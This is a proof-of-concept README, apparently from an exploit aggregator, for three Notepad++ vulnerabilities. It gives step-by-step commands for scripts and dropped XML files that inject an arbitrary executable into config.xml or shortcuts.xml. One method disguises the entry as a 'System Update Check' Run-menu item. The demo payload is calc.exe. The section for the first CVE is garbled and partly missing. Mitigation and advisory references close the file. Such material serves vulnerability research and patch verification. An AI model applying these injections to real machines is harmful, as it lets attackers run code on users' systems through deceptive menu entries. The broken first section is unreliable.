Share
## https://sploitus.com/exploit?id=96A4488F-33E5-52B1-8A37-193338512515
# Notepad++ PoCs
*CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800*

Proof-of-concept scripts for three vulnerabilities in Notepad++  0xc0000005)
```
Notepad++ window disappears. WER (Windows Error Reporting) may trigger.

---

## CVE-2026-48778 - RCE via config.xml

`%APPDATA%\Notepad++\config.xml` is read at startup. The `` value is passed directly to `ShellExecute()` without validation. Replacing it with any executable achieves RCE when the user clicks **File โ†’ Open Containing Folder โ†’ cmd**.

### Method A - Python script (recommended)

```
# Inject (backs up original automatically)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe

# Trigger: open Notepad++ -> File -> Open Containing Folder -> cmd
# calc.exe launches instead of cmd.exe

# Restore
python poc_CVE-2026-48778.py --mode direct --restore
```

### Method B - Drop XML file

```
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Open Notepad++ -> File -> Open Containing Folder -> cmd
```

### Method C - settingsDir (no AppData write)

```
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: File -> Open Containing Folder -> cmd
```

---

## CVE-2026-48800 - RCE via shortcuts.xml

`%APPDATA%\Notepad++\shortcuts.xml` is read at startup. `` entries under `` are added to the **Run** menu and passed directly to `ShellExecute()` without validation. An attacker-controlled entry executes on click.

### Method A - Python script (recommended)

```
# Inject (backs up original automatically)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

# Trigger: close and reopen Notepad++ -> Run menu -> "System Update Check"
# calc.exe launches

# Restore
python poc_CVE-2026-48800.py --mode direct --restore
```

### Method B - Drop XML file

```
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Restart Notepad++ -> Run menu -> "System Update Check"
```

### Method C - settingsDir (no AppData write)

```
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: Run menu -> "System Update Check"
```

---

## Mitigation

**Update Notepad++ to v8.9.6.1 or later.**  
Download: https://notepad-plus-plus.org/downloads/

---

## Advisory References

| CVE | Advisory |
|-----|----------|
| CVE-2026-48770 | GHSA-r39g-3mcw-xcg2 |
| CVE-2026-48778 | GHSA-7hm3-wp5q-ccv9 |
| CVE-2026-48800 | GHSA-3x3f-3j39-pj3v |

---

> For research and authorized testing purposes only.